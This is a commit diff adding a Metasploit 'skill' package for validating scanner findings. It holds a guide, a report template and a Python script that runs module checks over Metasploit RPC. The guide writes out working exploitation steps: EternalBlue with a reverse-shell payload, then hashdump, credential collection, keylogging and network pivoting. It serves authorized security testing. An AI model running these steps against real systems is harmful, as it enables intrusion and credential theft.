mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-06 07:48:57 +03:00
Initial commit - 611 cybersecurity skills across all subdomains
This commit is contained in:
@@ -0,0 +1,190 @@
|
||||
---
|
||||
name: None
|
||||
description: The Metasploit Framework is the world's most widely used penetration testing platform, maintained by Rapid7. It contains over 2,300 exploits, 1,200 auxiliary modules, and 400 post-exploitation modules
|
||||
domain: cybersecurity
|
||||
subdomain: vulnerability-management
|
||||
tags: [vulnerability-management, cve, metasploit, exploitation, penetration-testing, risk]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Exploiting Vulnerabilities with Metasploit Framework
|
||||
|
||||
## Overview
|
||||
The Metasploit Framework is the world's most widely used penetration testing platform, maintained by Rapid7. It contains over 2,300 exploits, 1,200 auxiliary modules, and 400 post-exploitation modules. Within vulnerability management, Metasploit serves as a validation tool to confirm that identified vulnerabilities are actually exploitable, enabling risk-based prioritization and demonstrating real-world impact to stakeholders.
|
||||
|
||||
## Prerequisites
|
||||
- Metasploit Framework installed (Kali Linux or standalone)
|
||||
- PostgreSQL database for session/credential management
|
||||
- Written authorization and rules of engagement for testing
|
||||
- Isolated test environment or approved production testing window
|
||||
- Understanding of networking, protocols, and exploitation concepts
|
||||
|
||||
## Core Concepts
|
||||
|
||||
### Metasploit Architecture
|
||||
- **msfconsole**: Primary interactive command-line interface
|
||||
- **Exploits**: Modules that leverage vulnerabilities to gain access
|
||||
- **Payloads**: Code executed on the target after successful exploitation
|
||||
- **Auxiliary**: Scanning, fuzzing, and information gathering modules
|
||||
- **Post-Exploitation**: Modules for privilege escalation, persistence, pivoting
|
||||
- **Encoders**: Payload encoding to evade signature-based detection
|
||||
- **Nops**: No-operation generators for payload alignment
|
||||
|
||||
### Exploitation Workflow in Vulnerability Management
|
||||
Unlike offensive red teaming, vulnerability management uses Metasploit to:
|
||||
1. **Validate** scanner findings (confirm exploitability)
|
||||
2. **Demonstrate** risk to business stakeholders
|
||||
3. **Prioritize** remediation based on proven exploitation paths
|
||||
4. **Verify** patches by confirming exploits no longer succeed
|
||||
|
||||
## Implementation Steps
|
||||
|
||||
### Step 1: Initialize Metasploit Environment
|
||||
```bash
|
||||
# Start PostgreSQL and initialize database
|
||||
sudo systemctl start postgresql
|
||||
sudo msfdb init
|
||||
|
||||
# Launch msfconsole
|
||||
msfconsole -q
|
||||
|
||||
# Verify database connection
|
||||
msf6> db_status
|
||||
msf6> workspace -a vuln_validation_2025
|
||||
|
||||
# Import vulnerability scan results
|
||||
msf6> db_import /path/to/nessus_scan.nessus
|
||||
msf6> hosts
|
||||
msf6> vulns
|
||||
```
|
||||
|
||||
### Step 2: Validate Specific Vulnerabilities
|
||||
```bash
|
||||
# Example: Validate MS17-010 (EternalBlue) from scan findings
|
||||
msf6> search type:exploit name:ms17_010
|
||||
msf6> use exploit/windows/smb/ms17_010_eternalblue
|
||||
msf6> show options
|
||||
msf6> set RHOSTS 192.168.1.100
|
||||
msf6> set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
||||
msf6> set LHOST 192.168.1.50
|
||||
msf6> set LPORT 4444
|
||||
|
||||
# Use check command first (non-exploitative validation)
|
||||
msf6> check
|
||||
# [+] 192.168.1.100:445 - Host is likely VULNERABLE to MS17-010!
|
||||
|
||||
# Only exploit if check confirms vulnerability and authorized
|
||||
msf6> exploit
|
||||
|
||||
# Example: Validate Apache Struts RCE (CVE-2017-5638)
|
||||
msf6> use exploit/multi/http/struts2_content_type_ognl
|
||||
msf6> set RHOSTS target.example.com
|
||||
msf6> set RPORT 8080
|
||||
msf6> set TARGETURI /showcase.action
|
||||
msf6> check
|
||||
|
||||
# Example: Validate Log4Shell (CVE-2021-44228)
|
||||
msf6> use exploit/multi/http/log4shell_header_injection
|
||||
msf6> set RHOSTS target.example.com
|
||||
msf6> set HTTP_HEADER X-Api-Version
|
||||
msf6> check
|
||||
```
|
||||
|
||||
### Step 3: Auxiliary Scanning for Validation
|
||||
```bash
|
||||
# SMB vulnerability scanning
|
||||
msf6> use auxiliary/scanner/smb/smb_ms17_010
|
||||
msf6> set RHOSTS 192.168.1.0/24
|
||||
msf6> set THREADS 10
|
||||
msf6> run
|
||||
|
||||
# SSL/TLS vulnerability checks
|
||||
msf6> use auxiliary/scanner/ssl/openssl_heartbleed
|
||||
msf6> set RHOSTS target.example.com
|
||||
msf6> run
|
||||
|
||||
# HTTP vulnerability validation
|
||||
msf6> use auxiliary/scanner/http/dir_listing
|
||||
msf6> set RHOSTS target.example.com
|
||||
msf6> run
|
||||
|
||||
# Database authentication testing
|
||||
msf6> use auxiliary/scanner/mssql/mssql_login
|
||||
msf6> set RHOSTS db-server.corp.local
|
||||
msf6> set USERNAME sa
|
||||
msf6> set PASSWORD ""
|
||||
msf6> run
|
||||
```
|
||||
|
||||
### Step 4: Post-Exploitation Impact Assessment
|
||||
```bash
|
||||
# After successful exploitation, demonstrate impact
|
||||
meterpreter> getuid
|
||||
meterpreter> sysinfo
|
||||
meterpreter> hashdump
|
||||
meterpreter> run post/multi/gather/env
|
||||
meterpreter> run post/windows/gather/enum_patches
|
||||
meterpreter> run post/windows/gather/credentials/credential_collector
|
||||
|
||||
# Network pivoting demonstration
|
||||
meterpreter> run post/multi/manage/autoroute
|
||||
meterpreter> run auxiliary/server/socks_proxy
|
||||
|
||||
# Screenshot for evidence
|
||||
meterpreter> screenshot
|
||||
meterpreter> keyscan_start
|
||||
```
|
||||
|
||||
### Step 5: Document and Report Findings
|
||||
```bash
|
||||
# Export exploitation evidence
|
||||
msf6> vulns -o /tmp/validated_vulns.csv
|
||||
msf6> hosts -o /tmp/compromised_hosts.csv
|
||||
msf6> creds -o /tmp/captured_creds.csv
|
||||
msf6> loot -o /tmp/captured_loot.csv
|
||||
|
||||
# Generate report from database
|
||||
msf6> db_export -f xml /tmp/msf_report.xml
|
||||
```
|
||||
|
||||
### Step 6: Post-Patch Verification
|
||||
```bash
|
||||
# After remediation, verify exploit no longer works
|
||||
msf6> use exploit/windows/smb/ms17_010_eternalblue
|
||||
msf6> set RHOSTS 192.168.1.100
|
||||
msf6> check
|
||||
# [-] 192.168.1.100:445 - Host does NOT appear vulnerable.
|
||||
# Patch verified successfully
|
||||
```
|
||||
|
||||
## Safety Controls
|
||||
1. **Always use `check` command** before `exploit` when available
|
||||
2. **Set AutoRunScript** for clean session management
|
||||
3. **Use EXITFUNC=thread** to prevent crashing target services
|
||||
4. **Limit payload capabilities** to minimum needed for validation
|
||||
5. **Document every action** for audit trail and evidence
|
||||
6. **Use workspace isolation** per engagement
|
||||
7. **Never run Metasploit against unauthorized targets**
|
||||
|
||||
## Best Practices
|
||||
1. Start with vulnerability check modules before exploitation
|
||||
2. Use Metasploit to validate top-priority scanner findings only
|
||||
3. Coordinate with system owners for testing windows
|
||||
4. Maintain detailed logs of all exploitation attempts
|
||||
5. Clean up all artifacts and sessions after testing
|
||||
6. Use results to create compelling risk narratives for stakeholders
|
||||
7. Integrate Metasploit validation into vulnerability management workflow
|
||||
|
||||
## Common Pitfalls
|
||||
- Exploiting without written authorization (legal liability)
|
||||
- Using exploitation on production systems without coordination
|
||||
- Not cleaning up Meterpreter sessions and artifacts
|
||||
- Confusing vulnerability validation with penetration testing scope
|
||||
- Using outdated Metasploit modules against patched systems
|
||||
- Failing to document exploitation evidence for remediation teams
|
||||
|
||||
## Related Skills
|
||||
- performing-red-team-validated-vulnerability-testing
|
||||
- scanning-infrastructure-with-nessus
|
||||
- performing-network-vulnerability-assessment
|
||||
@@ -0,0 +1,33 @@
|
||||
# Metasploit Vulnerability Validation Report Template
|
||||
|
||||
## Engagement Details
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| Engagement Type | Vulnerability Validation |
|
||||
| Authorization | [Document Reference] |
|
||||
| Testing Window | [Start] to [End] |
|
||||
| Tester | [Name] |
|
||||
| Tool | Metasploit Framework [version] |
|
||||
|
||||
## Validation Summary
|
||||
| Metric | Count |
|
||||
|--------|-------|
|
||||
| CVEs Tested | [N] |
|
||||
| Confirmed Exploitable | [N] |
|
||||
| Not Exploitable | [N] |
|
||||
| Inconclusive | [N] |
|
||||
| No Module Available | [N] |
|
||||
|
||||
## Confirmed Exploitable Vulnerabilities
|
||||
### [CVE-ID] - [Vulnerability Name]
|
||||
- **Module**: [exploit/category/module_name]
|
||||
- **Target**: [IP:Port]
|
||||
- **Impact**: [RCE/Auth Bypass/Info Disclosure]
|
||||
- **Exploitation Evidence**: [Screenshot/Output reference]
|
||||
- **Business Risk**: [Description of real-world impact]
|
||||
- **Remediation**: [Specific patch or mitigation]
|
||||
|
||||
## Post-Validation Recommendations
|
||||
1. [Prioritized remediation actions based on confirmed exploitation]
|
||||
2. [Network segmentation recommendations]
|
||||
3. [Detection rule recommendations for confirmed attack paths]
|
||||
@@ -0,0 +1,34 @@
|
||||
# Standards and References - Metasploit Framework
|
||||
|
||||
## Industry Standards
|
||||
- **PTES (Penetration Testing Execution Standard)**: http://www.pentest-standard.org/
|
||||
- **OWASP Testing Guide**: https://owasp.org/www-project-web-security-testing-guide/
|
||||
- **NIST SP 800-115**: Technical Guide to Information Security Testing and Assessment
|
||||
- **OSSTMM v3**: Open Source Security Testing Methodology Manual
|
||||
|
||||
## Metasploit Documentation
|
||||
- Metasploit Framework Docs: https://docs.rapid7.com/metasploit/
|
||||
- Metasploit Unleashed (OffSec): https://www.offsec.com/metasploit-unleashed/
|
||||
- Metasploit GitHub: https://github.com/rapid7/metasploit-framework
|
||||
- Module Development Guide: https://docs.metasploit.com/docs/development/developing-modules.html
|
||||
|
||||
## Key msfconsole Commands Reference
|
||||
| Command | Purpose |
|
||||
|---------|---------|
|
||||
| `search` | Search modules by name, CVE, platform |
|
||||
| `use` | Select a module |
|
||||
| `show options` | Display module configuration |
|
||||
| `set/setg` | Set module/global variables |
|
||||
| `check` | Verify vulnerability without exploitation |
|
||||
| `exploit/run` | Execute the module |
|
||||
| `sessions` | List active sessions |
|
||||
| `db_import` | Import scan results (Nessus, Nmap, etc.) |
|
||||
| `vulns` | List known vulnerabilities from database |
|
||||
| `workspace` | Manage engagement workspaces |
|
||||
|
||||
## Legal Considerations
|
||||
- Always obtain written authorization before testing
|
||||
- Define scope, rules of engagement, and emergency contacts
|
||||
- Document all activities for legal protection
|
||||
- Follow responsible disclosure for any new findings
|
||||
- Comply with local computer misuse laws
|
||||
@@ -0,0 +1,58 @@
|
||||
# Workflows - Metasploit Vulnerability Exploitation
|
||||
|
||||
## Workflow 1: Vulnerability Validation Pipeline
|
||||
|
||||
```
|
||||
┌───────────────┐ ┌───────────────┐ ┌───────────────┐
|
||||
│ Import Scan │──>│ Filter Top │──>│ Search MSF │
|
||||
│ Results to DB │ │ Priority CVEs │ │ Modules │
|
||||
└───────────────┘ └───────────────┘ └───────────────┘
|
||||
│
|
||||
┌─────────────────────────────────────┘
|
||||
v
|
||||
┌───────────────┐ ┌───────────────┐ ┌───────────────┐
|
||||
│ Run `check` │──>│ Exploit if │──>│ Document │
|
||||
│ Command │ │ Authorized │ │ Evidence │
|
||||
└───────────────┘ └───────────────┘ └───────────────┘
|
||||
│
|
||||
v
|
||||
┌───────────────┐ ┌───────────────┐
|
||||
│ Update Risk │──>│ Prioritize │
|
||||
│ Assessment │ │ Remediation │
|
||||
└───────────────┘ └───────────────┘
|
||||
```
|
||||
|
||||
## Workflow 2: Patch Verification
|
||||
|
||||
```
|
||||
Patch Deployed
|
||||
│
|
||||
├──> Re-run `check` command against patched host
|
||||
│ │
|
||||
│ ├──> NOT VULNERABLE → Patch verified ✓
|
||||
│ └──> STILL VULNERABLE → Patch failed ✗
|
||||
│ │
|
||||
│ └──> Escalate to remediation team
|
||||
│
|
||||
└──> Re-run auxiliary scanner
|
||||
│
|
||||
├──> No findings → Remediation confirmed
|
||||
└──> Findings persist → Incomplete patch
|
||||
```
|
||||
|
||||
## Workflow 3: Metasploit Module Selection
|
||||
|
||||
```
|
||||
CVE Identified
|
||||
│
|
||||
├──> search cve:CVE-YYYY-NNNNN
|
||||
│ │
|
||||
│ ├──> Exploit module found → Use for validation
|
||||
│ ├──> Auxiliary scanner found → Use for bulk check
|
||||
│ └──> No module found → Manual validation required
|
||||
│
|
||||
└──> Alternative: search for related modules
|
||||
│
|
||||
├──> search type:exploit platform:windows target:smb
|
||||
└──> search type:auxiliary name:scanner
|
||||
```
|
||||
@@ -0,0 +1,317 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
Metasploit Vulnerability Validation Automation
|
||||
|
||||
Uses Metasploit RPC API (msfrpcd) to automate vulnerability validation
|
||||
by running check commands against scan findings.
|
||||
|
||||
Requirements:
|
||||
pip install requests pandas pymetasploit3
|
||||
|
||||
Usage:
|
||||
python process.py validate --vulns vulns.csv --msf-host 127.0.0.1 --msf-pass password
|
||||
python process.py report --results validation_results.csv
|
||||
"""
|
||||
|
||||
import argparse
|
||||
import json
|
||||
import sys
|
||||
import time
|
||||
from datetime import datetime
|
||||
|
||||
import pandas as pd
|
||||
import requests
|
||||
|
||||
|
||||
class MetasploitRPC:
|
||||
"""Interface to Metasploit RPC API for automated vulnerability validation."""
|
||||
|
||||
def __init__(self, host: str = "127.0.0.1", port: int = 55553,
|
||||
username: str = "msf", password: str = "password",
|
||||
ssl: bool = True):
|
||||
self.base_url = f"{'https' if ssl else 'http'}://{host}:{port}/api/"
|
||||
self.token = None
|
||||
self.session = requests.Session()
|
||||
self.session.verify = False
|
||||
|
||||
# Authenticate
|
||||
self._login(username, password)
|
||||
|
||||
def _login(self, username: str, password: str):
|
||||
"""Authenticate to msfrpcd."""
|
||||
result = self._call("auth.login", [username, password])
|
||||
if result.get("result") == "success":
|
||||
self.token = result["token"]
|
||||
print(f"[+] Authenticated to Metasploit RPC")
|
||||
else:
|
||||
raise ConnectionError(f"Metasploit RPC auth failed: {result}")
|
||||
|
||||
def _call(self, method: str, params: list = None) -> dict:
|
||||
"""Make an RPC call to Metasploit."""
|
||||
payload = json.dumps({
|
||||
"jsonrpc": "2.0",
|
||||
"method": method,
|
||||
"id": 1,
|
||||
"params": [self.token] + (params or []) if self.token else (params or [])
|
||||
})
|
||||
|
||||
try:
|
||||
response = self.session.post(
|
||||
self.base_url, data=payload,
|
||||
headers={"Content-Type": "application/json"},
|
||||
timeout=60
|
||||
)
|
||||
return response.json().get("result", response.json())
|
||||
except Exception as e:
|
||||
return {"error": str(e)}
|
||||
|
||||
def create_console(self) -> str:
|
||||
"""Create a new Metasploit console."""
|
||||
result = self._call("console.create")
|
||||
console_id = result.get("id")
|
||||
print(f"[+] Console created: {console_id}")
|
||||
return console_id
|
||||
|
||||
def console_write(self, console_id: str, command: str):
|
||||
"""Write a command to a console."""
|
||||
self._call("console.write", [console_id, command + "\n"])
|
||||
|
||||
def console_read(self, console_id: str, timeout: int = 30) -> str:
|
||||
"""Read output from a console with polling."""
|
||||
output = ""
|
||||
start = time.time()
|
||||
while time.time() - start < timeout:
|
||||
result = self._call("console.read", [console_id])
|
||||
data = result.get("data", "")
|
||||
output += data
|
||||
if not result.get("busy", True):
|
||||
break
|
||||
time.sleep(2)
|
||||
return output
|
||||
|
||||
def run_check(self, console_id: str, module: str, rhosts: str,
|
||||
options: dict = None) -> dict:
|
||||
"""Run a module check command and return results."""
|
||||
self.console_write(console_id, f"use {module}")
|
||||
time.sleep(1)
|
||||
self.console_read(console_id, timeout=5)
|
||||
|
||||
self.console_write(console_id, f"set RHOSTS {rhosts}")
|
||||
time.sleep(0.5)
|
||||
|
||||
if options:
|
||||
for key, value in options.items():
|
||||
self.console_write(console_id, f"set {key} {value}")
|
||||
time.sleep(0.5)
|
||||
|
||||
self.console_read(console_id, timeout=5)
|
||||
self.console_write(console_id, "check")
|
||||
output = self.console_read(console_id, timeout=60)
|
||||
|
||||
is_vulnerable = any(
|
||||
indicator in output.lower()
|
||||
for indicator in ["is vulnerable", "appears vulnerable", "[+]"]
|
||||
)
|
||||
is_not_vulnerable = any(
|
||||
indicator in output.lower()
|
||||
for indicator in ["not vulnerable", "does not appear", "safe"]
|
||||
)
|
||||
|
||||
status = "unknown"
|
||||
if is_vulnerable and not is_not_vulnerable:
|
||||
status = "vulnerable"
|
||||
elif is_not_vulnerable:
|
||||
status = "not_vulnerable"
|
||||
elif "check is not supported" in output.lower():
|
||||
status = "check_unsupported"
|
||||
|
||||
return {
|
||||
"module": module,
|
||||
"target": rhosts,
|
||||
"status": status,
|
||||
"output": output[:2000],
|
||||
"timestamp": datetime.now().isoformat(),
|
||||
}
|
||||
|
||||
def search_module(self, console_id: str, search_term: str) -> list:
|
||||
"""Search for Metasploit modules."""
|
||||
self.console_write(console_id, f"search {search_term}")
|
||||
output = self.console_read(console_id, timeout=30)
|
||||
|
||||
modules = []
|
||||
for line in output.split("\n"):
|
||||
if line.strip().startswith(("exploit/", "auxiliary/")):
|
||||
parts = line.strip().split()
|
||||
if len(parts) >= 3:
|
||||
modules.append({
|
||||
"module": parts[0],
|
||||
"date": parts[1],
|
||||
"rank": parts[2] if len(parts) > 2 else "",
|
||||
"description": " ".join(parts[3:]) if len(parts) > 3 else "",
|
||||
})
|
||||
return modules
|
||||
|
||||
def destroy_console(self, console_id: str):
|
||||
"""Destroy a console."""
|
||||
self._call("console.destroy", [console_id])
|
||||
|
||||
|
||||
class VulnerabilityValidator:
|
||||
"""Validate scanner findings using Metasploit check capabilities."""
|
||||
|
||||
# Map common CVEs to Metasploit modules
|
||||
CVE_MODULE_MAP = {
|
||||
"CVE-2017-0144": "exploit/windows/smb/ms17_010_eternalblue",
|
||||
"CVE-2019-0708": "exploit/windows/rdp/cve_2019_0708_bluekeep_rce",
|
||||
"CVE-2020-1472": "exploit/windows/dcerpc/cve_2020_1472_zerologon",
|
||||
"CVE-2021-44228": "exploit/multi/http/log4shell_header_injection",
|
||||
"CVE-2021-34527": "exploit/windows/dcerpc/cve_2021_1675_printnightmare",
|
||||
"CVE-2022-26134": "exploit/multi/http/atlassian_confluence_namespace_ognl",
|
||||
"CVE-2023-27997": "exploit/linux/http/fortinet_fortigate_sslvpn_rce",
|
||||
"CVE-2024-3094": "auxiliary/scanner/ssh/xz_backdoor_scanner",
|
||||
"CVE-2014-0160": "auxiliary/scanner/ssl/openssl_heartbleed",
|
||||
"CVE-2014-6271": "exploit/multi/http/apache_mod_cgi_bash_env_exec",
|
||||
}
|
||||
|
||||
# Map service/plugin families to auxiliary scanner modules
|
||||
SERVICE_SCANNER_MAP = {
|
||||
"smb": "auxiliary/scanner/smb/smb_ms17_010",
|
||||
"rdp": "auxiliary/scanner/rdp/cve_2019_0708_bluekeep",
|
||||
"ssl_heartbleed": "auxiliary/scanner/ssl/openssl_heartbleed",
|
||||
"http_dir_listing": "auxiliary/scanner/http/dir_listing",
|
||||
"ftp_anonymous": "auxiliary/scanner/ftp/anonymous",
|
||||
"ssh_enumusers": "auxiliary/scanner/ssh/ssh_enumusers",
|
||||
"mssql_login": "auxiliary/scanner/mssql/mssql_login",
|
||||
}
|
||||
|
||||
def __init__(self):
|
||||
self.results = []
|
||||
|
||||
def find_module(self, cve: str) -> str:
|
||||
"""Find the best Metasploit module for a given CVE."""
|
||||
return self.CVE_MODULE_MAP.get(cve, "")
|
||||
|
||||
def validate_from_csv(self, csv_path: str, msf: MetasploitRPC) -> pd.DataFrame:
|
||||
"""Validate vulnerabilities from a CSV file using Metasploit."""
|
||||
df = pd.read_csv(csv_path)
|
||||
console_id = msf.create_console()
|
||||
|
||||
try:
|
||||
for _, row in df.iterrows():
|
||||
cve = row.get("cve", "")
|
||||
host = row.get("host", row.get("hostname", ""))
|
||||
module = row.get("msf_module", self.find_module(cve))
|
||||
|
||||
if not module:
|
||||
self.results.append({
|
||||
"cve": cve, "host": host, "module": "",
|
||||
"status": "no_module", "output": "No Metasploit module mapped",
|
||||
"timestamp": datetime.now().isoformat(),
|
||||
})
|
||||
print(f" [?] {cve} on {host}: No module available")
|
||||
continue
|
||||
|
||||
print(f" [*] Checking {cve} on {host} with {module}...")
|
||||
result = msf.run_check(console_id, module, host)
|
||||
result["cve"] = cve
|
||||
self.results.append(result)
|
||||
|
||||
status_icon = "[+]" if result["status"] == "vulnerable" else "[-]"
|
||||
print(f" {status_icon} {cve} on {host}: {result['status']}")
|
||||
|
||||
finally:
|
||||
msf.destroy_console(console_id)
|
||||
|
||||
return pd.DataFrame(self.results)
|
||||
|
||||
def generate_report(self, output_path: str):
|
||||
"""Generate validation report."""
|
||||
if not self.results:
|
||||
print("[-] No results to report")
|
||||
return
|
||||
|
||||
df = pd.DataFrame(self.results)
|
||||
total = len(df)
|
||||
confirmed = len(df[df["status"] == "vulnerable"])
|
||||
not_vuln = len(df[df["status"] == "not_vulnerable"])
|
||||
unknown = len(df[df["status"].isin(["unknown", "check_unsupported"])])
|
||||
no_module = len(df[df["status"] == "no_module"])
|
||||
|
||||
html = f"""<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Metasploit Validation Report</title>
|
||||
<style>
|
||||
body {{ font-family: Arial, sans-serif; margin: 20px; background: #f5f5f5; }}
|
||||
.header {{ background: #1a1a2e; color: white; padding: 20px; border-radius: 8px; }}
|
||||
.metrics {{ display: flex; gap: 15px; margin: 20px 0; }}
|
||||
.card {{ background: white; padding: 20px; border-radius: 8px; flex: 1; text-align: center;
|
||||
box-shadow: 0 2px 4px rgba(0,0,0,0.1); }}
|
||||
.card h3 {{ margin: 0; font-size: 2em; }}
|
||||
.confirmed {{ border-top: 4px solid #e74c3c; }}
|
||||
.safe {{ border-top: 4px solid #27ae60; }}
|
||||
.unknown {{ border-top: 4px solid #f39c12; }}
|
||||
table {{ width: 100%; border-collapse: collapse; background: white; margin: 15px 0; }}
|
||||
th {{ background: #2c3e50; color: white; padding: 10px; text-align: left; }}
|
||||
td {{ padding: 8px; border-bottom: 1px solid #eee; }}
|
||||
.status-vulnerable {{ color: #e74c3c; font-weight: bold; }}
|
||||
.status-not_vulnerable {{ color: #27ae60; }}
|
||||
.status-unknown {{ color: #f39c12; }}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<div class="header">
|
||||
<h1>Vulnerability Validation Report</h1>
|
||||
<p>Tool: Metasploit Framework | Date: {datetime.now().strftime('%Y-%m-%d')}</p>
|
||||
</div>
|
||||
<div class="metrics">
|
||||
<div class="card confirmed"><h3>{confirmed}</h3><p>Confirmed Vulnerable</p></div>
|
||||
<div class="card safe"><h3>{not_vuln}</h3><p>Not Vulnerable</p></div>
|
||||
<div class="card unknown"><h3>{unknown}</h3><p>Inconclusive</p></div>
|
||||
<div class="card"><h3>{no_module}</h3><p>No Module Available</p></div>
|
||||
</div>
|
||||
<h2>Validation Results</h2>
|
||||
<table>
|
||||
<tr><th>CVE</th><th>Host</th><th>Module</th><th>Status</th></tr>
|
||||
{''.join(f'<tr><td>{r.get("cve","")}</td><td>{r.get("target",r.get("host",""))}</td><td>{r.get("module","")}</td><td class="status-{r["status"]}">{r["status"]}</td></tr>' for r in self.results)}
|
||||
</table>
|
||||
</body>
|
||||
</html>"""
|
||||
|
||||
with open(output_path, "w", encoding="utf-8") as f:
|
||||
f.write(html)
|
||||
print(f"[+] Report saved to: {output_path}")
|
||||
|
||||
|
||||
def main():
|
||||
parser = argparse.ArgumentParser(description="Metasploit Vulnerability Validation")
|
||||
subparsers = parser.add_subparsers(dest="command")
|
||||
|
||||
val_p = subparsers.add_parser("validate", help="Validate vulnerabilities with Metasploit")
|
||||
val_p.add_argument("--vulns", required=True, help="CSV with cve, host columns")
|
||||
val_p.add_argument("--msf-host", default="127.0.0.1", help="msfrpcd host")
|
||||
val_p.add_argument("--msf-port", type=int, default=55553, help="msfrpcd port")
|
||||
val_p.add_argument("--msf-user", default="msf", help="msfrpcd username")
|
||||
val_p.add_argument("--msf-pass", required=True, help="msfrpcd password")
|
||||
val_p.add_argument("--output", default="validation_results.csv")
|
||||
val_p.add_argument("--report", default="validation_report.html")
|
||||
|
||||
args = parser.parse_args()
|
||||
|
||||
if args.command == "validate":
|
||||
msf = MetasploitRPC(
|
||||
host=args.msf_host, port=args.msf_port,
|
||||
username=args.msf_user, password=args.msf_pass
|
||||
)
|
||||
validator = VulnerabilityValidator()
|
||||
results_df = validator.validate_from_csv(args.vulns, msf)
|
||||
results_df.to_csv(args.output, index=False)
|
||||
print(f"[+] Results saved to: {args.output}")
|
||||
validator.generate_report(args.report)
|
||||
|
||||
else:
|
||||
parser.print_help()
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
Reference in New Issue
Block a user